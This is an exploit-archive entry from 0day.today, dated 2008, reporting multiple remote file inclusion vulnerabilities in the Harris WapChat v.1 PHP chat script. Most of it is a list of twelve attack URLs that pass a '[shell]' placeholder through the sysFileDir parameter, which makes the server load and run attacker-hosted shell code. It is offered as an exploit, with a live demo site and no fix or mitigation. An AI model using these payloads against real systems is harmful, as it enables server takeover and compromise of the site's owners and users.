Harris WapChat v.1 Multiple Remote File Inclusion Vulnerabilities

2008-04-30T00:00:00
ID 1337DAY-ID-2941
Type zdt
Reporter k1n9k0ng
Modified 2008-04-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
Harris WapChat v.1 Multiple Remote File Inclusion Vulnerabilities
=================================================================


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : Harris Wap Chat
Discovered By   : k1n9k0ng
Scripts site    : http://www.successkid.com/
Special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee
          letjen, k1tk4t, inouf and jayoes
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo Site :
http://successkid.com/wapchat/itdiv.php

Bug Found:
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreate.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adCreateSave.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.createRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.forward.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.pageLogout.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.resultMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.saveNewRoom.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.searchMember.php?sysFileDir=[shell]
http://www.site.com/wapchat/src/eng.writeMsg.php?sysFileDir=[shell]



#  0day.today [2018-04-01]  #